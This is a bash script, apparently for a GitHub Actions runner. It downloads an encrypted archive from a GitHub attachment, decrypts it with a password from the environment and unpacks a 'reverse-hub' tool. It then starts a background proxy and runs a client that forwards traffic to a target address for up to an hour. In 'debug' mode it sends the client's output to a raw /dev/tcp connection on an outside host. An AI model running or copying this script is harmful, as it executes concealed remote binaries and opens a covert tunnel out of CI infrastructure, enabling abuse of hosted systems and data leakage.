#!/bin/bash

curl -o linux_amd64.tar.gz.enc -L https://github.com/gaohuia/share/files/10774373/linux_amd64.tar.gz.gz

openssl enc -aes256 -d -pass env:PASS -iter 10 -in linux_amd64.tar.gz.enc -out linux_amd64.tar.gz

tar zxvf linux_amd64.tar.gz
cd reverse-hub

nohup ./proxy > ./out.log 2>&1 &

echo "Running"
msg=$(gh api "/repos/${GITHUB_REPOSITORY}/commits?per_page=1&page=1" | jq -r '.[0].commit.message')
if echo "$msg" | grep debug; then
  timeout 3600 ./client -url $TARGET_URL -forward-to $TARGET_ADDR > /dev/tcp/nav.zeroplace.cn/60003 2>&1
else
  timeout 3600 ./client -url $TARGET_URL -forward-to $TARGET_ADDR > client.log 2>&1 
fi



